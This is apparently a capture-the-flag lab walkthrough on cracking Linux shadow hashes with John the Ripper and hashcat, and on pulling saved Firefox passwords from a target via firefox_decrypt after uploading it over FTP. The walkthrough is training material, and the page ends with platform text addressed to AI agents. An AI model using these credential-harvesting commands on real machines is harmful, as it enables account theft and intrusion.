> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/linux-auth-process/linux-auth-and-credential-hunting-lab-walkthrough.md).

# Linux Auth & Credential Hunting — Lab Walkthrough

### Lab 1 — Cracking Linux Credentials

#### Objective 1: Find martin's password using Single Crack Mode

Single crack mode generates candidates derived from the username itself — inversions, number appends, capitalizations, etc. It's the fastest mode and works when users set weak passwords based on their own username.

**Step 1 — Combine passwd and shadow:**

```bash
unshadow passwd shadow | tee unshadowed
```

**Step 2 — Run JtR in single crack mode:**

```bash
john --single unshadowed
```

JtR derives `martin`'s password directly from the username. If it cracks, the password was trivially username-based.

**View cracked passwords:**

```bash
john --show unshadowed
```

***

#### Objective 2: Find sarah's password using a Wordlist Attack

**Step 1 — Identify hash type:**

Sarah's hash starts with `$6$` → SHA-512crypt.

```bash
hashcat --help | grep sha512
# Mode 1800 = sha512crypt $6$, SHA512 (Unix)
```

**Step 2 — Isolate the hash:**

```bash
echo '$6$EBOM5vJAV1TPvrdP$LqsLyYkoGzAGt4ihyvfhvBrrGpVjV976B3dEubi9i95P5cDx1U6BrE9G020PWuaeI6JSNaIDIbn43uskRDG0U/' | tee myhash
```

> Always isolate just the hash portion — the full shadow line format (`user:hash:...`) is for JtR. Hashcat needs the raw hash only.

**Step 3 — Run hashcat dictionary attack:**

```bash
hashcat -a 0 -m 1800 myhash /usr/share/wordlists/rockyou.txt
```

| Flag | Value  | Meaning                      |
| ---- | ------ | ---------------------------- |
| `-a` | `0`    | Dictionary (straight) attack |
| `-m` | `1800` | SHA-512crypt (`$6$`)         |

***

### Lab 2 — Credential Hunting in Linux (Firefox Decrypt)

#### Objective: Find the password of user `will`

**Step 1 — Locate Firefox profile on target:**

```bash
ls -l ~/.mozilla/firefox/ | grep default
# Found: ytb95ytb.default-release
```

**Step 2 — Confirm credentials exist in logins.json:**

```bash
cat ~/.mozilla/firefox/ytb95ytb.default-release/logins.json | python3 -m json.tool
```

Credentials are present but encrypted (`encryptedUsername`, `encryptedPassword`). The target URL is `https://dev.inlanefreight.com`.

**Step 3 — Set up firefox\_decrypt on attack machine:**

```bash
git clone https://github.com/unode/firefox_decrypt
cd firefox_decrypt
```

**Step 4 — Transfer to target via FTP:**

```bash
# On attack machine — start FTP server
sudo python3 -m pyftpdlib --port 21
```

```bash
# On target — download the tool
ftp <attack_machine_ip>
get firefox_decrypt.py
bye
```

**Step 5 — Run decryption on target:**

```bash
python3.9 firefox_decrypt.py
# Select profile when prompted → outputs plaintext credentials
```

***

### Key Takeaways

**Single crack mode** is the first thing to try on Linux hashes — it's near-instant and catches users who set passwords based on their username.

**Hash identification** from the `$id$` prefix is essential before running hashcat — wrong mode = no results.

**Firefox logins.json** always has encrypted credentials, but the decryption key (`key4.db`) is stored in the same profile directory — `firefox_decrypt` uses both together to recover plaintext.

**File transfer method matters** — when pip/wget isn't available or ports are restricted, `pyftpdlib` is a reliable one-liner FTP server for transferring tools to targets.

***

### Quick Reference

```bash
# Combine shadow files
unshadow passwd shadow > unshadowed

# JtR single crack
john --single unshadowed
john --show unshadowed

# Hashcat wordlist — SHA-512crypt
hashcat -a 0 -m 1800 myhash rockyou.txt

# Firefox decrypt
git clone https://github.com/unode/firefox_decrypt
python3.9 firefox_decrypt.py -p ~/.mozilla/firefox/<profile>/

# Serve files via FTP (attack machine)
sudo python3 -m pyftpdlib --port 21
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/linux-auth-process/linux-auth-and-credential-hunting-lab-walkthrough.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
